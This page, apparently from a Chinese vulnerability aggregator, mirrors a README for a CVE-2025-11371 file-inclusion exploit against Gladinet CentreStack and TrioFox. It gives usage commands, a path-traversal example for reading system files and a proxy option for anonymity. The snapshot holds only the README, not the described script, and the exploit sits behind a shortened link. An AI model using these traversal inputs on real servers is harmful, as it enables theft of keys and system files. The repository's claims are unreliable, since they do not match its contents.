关联漏洞
标题:
Gladinet CentreStack和Gladinet TrioFox 安全漏洞
(CVE-2025-11371)
描述:Gladinet CentreStack和Gladinet TrioFox都是美国Gladinet公司的产品。Gladinet CentreStack是一个主要移动访问和安全共享解决方案。提供自托管云存储。Gladinet TrioFox是一个云服务托管版平台。 Gladinet CentreStack和Gladinet TrioFox 16.7.10368.56560及之前版本存在安全漏洞,该漏洞源于默认安装和配置中存在未经认证的本地文件包含缺陷,可能导致系统文件意外泄露。
介绍
# CVE-2025-11371
### Overview
This repository contains a proof-of-concept exploit for CVE-2025-11371, an unauthenticated Local File Inclusion (LFI) vulnerability in Gladinet CentreStack and TrioFox. The exploit allows remote retrieval of sensitive system files, such as the Web.config, which can expose machine keys leading to further RCE via deserialization flaws like CVE-2025-30406.
Affected versions: All versions up to and including 16.7.10368.56560.
### Requirements
- Python 3.8+
- Libraries: requests, argparse (install via `pip install -r requirements.txt`)
### Usage
- Install dependencies: `pip install -r requirements.txt`
- Run the exploit: `python exploit.py --target <target_url> --file "/path/to/Web.config"`
Options:
- `--target`: URL of the vulnerable CentreStack/TrioFox instance.
- `--file`: Relative path to the file to include (e.g., "../../../../Windows/system.ini" for testing).
- `--proxy`: Optional HTTP proxy for anonymization.
### How It Works
The vulnerability stems from improper input validation in the UploadDownloadProxy component's temp handler. The exploit crafts a specially formed request to the endpoint, appending traversal sequences to reach outside the web root.
### Proof of Concept
Tested against a default CentreStack setup on Windows Server 2019. Successful file reads include:
- Web.config (machine key disclosure)
- Machine.config
- Sensitive logs in %PROGRAMDATA%
### Ethical Use Warning
- This script is a proof-of-concept for CVE-2025-11371 for educational and authorized security testing purposes.
- **Do not use this script on systems without explicit permission from the system owner.**
- Misuse may violate laws, including the Computer Fraud and Abuse Act (CFAA) in the United States or similar laws elsewhere.
- Always obtain written consent before testing any system.
### PoC Exploit - [href](https://tinyurl.com/ywabn2vc)
For any inquiries, please email me at: eviedejesu803@gmail.com
文件快照
[4.0K] /data/pocs/abb7308574269acbd3c8688a0a2d0dfdaf2b9c5d
└── [1.9K] README.md
0 directories, 1 file
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。